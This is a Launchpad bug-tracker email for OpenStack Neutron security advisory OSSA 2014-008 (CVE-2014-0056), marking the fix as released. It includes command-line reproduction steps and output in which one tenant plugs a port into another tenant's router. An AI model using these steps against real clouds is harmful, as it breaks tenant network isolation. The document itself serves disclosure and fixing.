** Changed in: neutron Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1243327
Title: [OSSA 2014-008] Routers can be cross plugged by other tenants (CVE-2014-0056) Status in OpenStack Neutron (virtual network service): Fix Released Status in neutron grizzly series: In Progress Status in neutron havana series: Fix Committed Status in OpenStack Security Advisories: Fix Released Bug description: The l3-agent does not check tenant_id and allows for tenants to be able to plug ports into other's routers if the device_id is set to another tenants router. # become admin tenant arosen@arosen-desktop:~/devstack$ source openrc admin admin # Create router as admin: arosen@arosen-desktop:~/devstack$ neutron router-create admin-router Created a new router: +-----------------------+--------------------------------------+ | Field | Value | +-----------------------+--------------------------------------+ | admin_state_up | True | | external_gateway_info | | | id | 80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 | | name | admin-router | | status | ACTIVE | | tenant_id | 04e94acfe69f4960a69c6a78d39466c4 | +-----------------------+--------------------------------------+ # Become demo tenant arosen@arosen-desktop:~/devstack$ source openrc demo demo #create port with correct device_id and device_owner arosen@arosen-desktop:~/devstack$ neutron port-create private --device-id 80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 --device-owner network:router_interface Created a new port: +-----------------------+---------------------------------------------------------------------------------+ | Field | Value | +-----------------------+---------------------------------------------------------------------------------+ | admin_state_up | True | | allowed_address_pairs | | | device_id | 80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 | | device_owner | network:router_interface | | fixed_ips | {"subnet_id": "5786a0a6-24c8-4156-b981-cc817011c6a7", "ip_address": "10.0.0.3"} | | id | 895cf428-4bfb-4c79-86c2-d40af9bf3587 | | mac_address | fa:16:3e:21:33:6c | | name | | | network_id | 4de8b4f6-ac11-4836-aefb-7ed4f49ab9a7 | | security_groups | | | status | DOWN | | tenant_id | ad069ea620614cce9c4b6f088d39d03e | +-----------------------+---------------------------------------------------------------------------------+ Now when the l3-agent is restarted or enters its periodic sync state: arosen@arosen-desktop:~/devstack$ sudo ip netns exec qrouter-80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 ifconfig lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) qr-895cf428-4b Link encap:Ethernet HWaddr fa:16:3e:21:33:6c inet addr:10.0.0.3 Bcast:10.0.0.255 Mask:255.255.255.0 inet6 addr: fe80::f816:3eff:fe21:336c/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:4 errors:0 dropped:0 overruns:0 frame:0 TX packets:5 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:300 (300.0 B) TX bytes:398 (398.0 B) To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1243327/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp